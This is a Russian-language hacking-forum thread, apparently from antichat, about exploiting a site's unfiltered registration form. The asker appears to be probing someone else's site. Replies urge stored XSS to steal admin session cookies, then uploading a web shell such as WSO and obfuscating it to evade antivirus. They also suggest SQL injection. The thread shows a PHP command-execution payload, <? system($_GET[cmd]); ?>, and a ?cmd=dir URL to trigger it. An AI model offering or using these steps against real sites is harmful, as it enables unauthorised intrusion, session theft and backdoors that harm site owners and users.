Просмотр полной версии : [Вопрос] Уязвимость сайт<->БД
Есть форма регистрации.
В ней указывается логин пароль и e-mail адрес.
По какой-то причине сломался механизм проверки введеных значений и в данный момент в базу можно влить любой текст, код. Ничего абсолютно не обрезается.
Также есть страница пользователя, в которой можно посмоть текущий логин, сменить пароль и отображает e-mail (в данном случае отображает то, что туда влито)
Собственно вопрос: Где можно почитать по поводу использования уязвимостей данного типа? Что можно сделать используя такой метод?
Есть форма регистрации.
В ней указывается логин пароль и e-mail адрес.
По какой-то причине сломался механизм проверки введеных значений и в данный момент в базу можно влить любой текст, код. Ничего абсолютно не обрезается.
Также есть страница пользователя, в которой можно посмоть текущий логин, сменить пароль и отображает e-mail (в данном случае отображает то, что туда влито)
Собственно вопрос: Где можно почитать по поводу использования уязвимостей данного типа? Что можно сделать используя такой метод?
Если не фильтруеться при выводе - активную XSS пользуй.
Если и при вводе в БД ничего не экранируеться,и не режеться,то попробуй провести SQL-inj.
Читай Сборник статей (http://forum.antichat.ru/thread19610.html)
shell_c0de
25.12.2009, 14:24
через активку поймай сессию админа и через админку попробуй залить шелл
При вводе в бд не режутся даже пробелы. Льется как есть.
И выводится точно в том виде как было введено при заливке.
Спасибо за статьи. Изучаю. Ни разу просто с такими уязвимостями не встречался.
При выводе данных режутся ошибки MySQL.
Веб-сервер стоит на Win server 2008, я так понимаю шелл особой роли не сыграет.
При вводе в бд не режутся даже пробелы. Льется как есть.
И выводится точно в том виде как было введено при заливке.
Спасибо за статьи. Изучаю. Ни разу просто с такими уязвимостями не встречался.
При выводе данных режутся ошибки MySQL.
Веб-сервер стоит на Win server 2008, я так понимаю шелл особой роли не сыграет.
А что,если окошки стоят то шел уже не торт?
Так же лей, и все будет работать,если конечно там нет супер антивируса,но код всегда можно обфусцировать например.В твоем случае удачнее всего заюзать XSS, слить куки админа,и уже в админке рулить.Ну это мое имхо
через активку поймай сессию админа и через админку попробуй залить шелл
Дело в том, что это не форум. Самописный сайт.
Админка есть, но в ней я думаю не особо разгуляешься. Я так думаю там простой менеджер учетных записей.
Но попытаться я думаю стоит.
А что,если окошки стоят то шел уже не торт?
Так же лей, и все будет работать,если конечно там нет супер антивируса,но код всегда можно обфусцировать например.В твоем случае удачнее всего заюзать XSS, слить куки админа,и уже в админке рулить.Ну это мое имхо
WSO некак? Он ещё не палиться.
Зачем XSS если есть скуля? Просвятите?
если бы было все так просто, не было бы таких простых вопросов, и ответов соответственно, скорее всего все фильтруецо просто чел не втыкает и что еще более вероятно не знает что действительно ему нужно...
тред явно для експертов в области ясновидения
Лично я с такими дырами не встречался. Нигде и описаний толком нет по такой баге.
По умолчанию считается, что такую дыру в форме регистрации может оставить только лопух. И поэтому "простых" методов я не нашел.
Вот я и нарвался на такого лопуха судя по всему)
Есть ввод, не режет абсолютно ничего как я и отписал.
Это видно по выводу. Если влитьть произвольный текст с пробелами и знаками на выдаче в поле e-mail без изменений я вижу тотже текст.
Например влив
<? system($_GET[cmd]); ?>
на выдаче я получаю пустую строку в поле e-mail, но сам php-код без изменений виден в исходном коде страницы. Думаю пока как разрулить.
http://desc.mirknigi.ru/product_docs/img_content/1/12/122/1224431033098271003661.gif
Лично я с такими дырами не встречался. Нигде и описаний толком нет по такой баге.
По умолчанию считается, что такую дыру в форме регистрации может оставить только лопух. И поэтому "простых" методов я не нашел.
Вот я и нарвался на такого лопуха судя по всему)
Есть ввод, не режет абсолютно ничего как я и отписал.
Это видно по выводу. Если влитьть произвольный текст с пробелами и знаками на выдаче в поле e-mail без изменений я вижу тотже текст.
Например влив
<? system($_GET[cmd]); ?>
на выдаче я получаю пустую строку в поле e-mail, но сам php-код без изменений виден в исходном коде страницы. Думаю пока как разрулить.
Дык, пробуй выполнить смд.
http://site.com/index.php?cmd=dir
WSO некак? Он ещё не палиться.
Зачем XSS если есть скуля? Просвятите?
Кто сказал что там есть скуля? Он же сказал что ошибки мускула подавляютьс,если они вообще есть =)
Дык, пробуй выполнить смд.
http://site.com/index.php?cmd=dir
еще раз перечитай пост его, так невыйдет пхп невыполняеться
Вобще вливается всё без проблем в базу, но последующем наткнулся на фильтрацию запросов самим хостингом.
Дык, пробуй выполнить смд.
http://site.com/index.php?cmd=dir
Это я в первую очередь пробовал.
Либо хостинг пишет, что выявлен опасный запрос и он естественно не выполняется, либо возвращается таже страница без изменений.
XSS самый лучший вариант...С ним меньше мучатся придётся чем со sql-inj, да и не факт что она там вообще есть как подметил m0Hze...
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot